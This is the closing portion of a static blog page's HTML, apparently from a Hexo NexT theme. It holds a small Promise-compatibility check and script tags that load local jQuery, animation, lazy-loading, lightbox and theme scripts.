    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
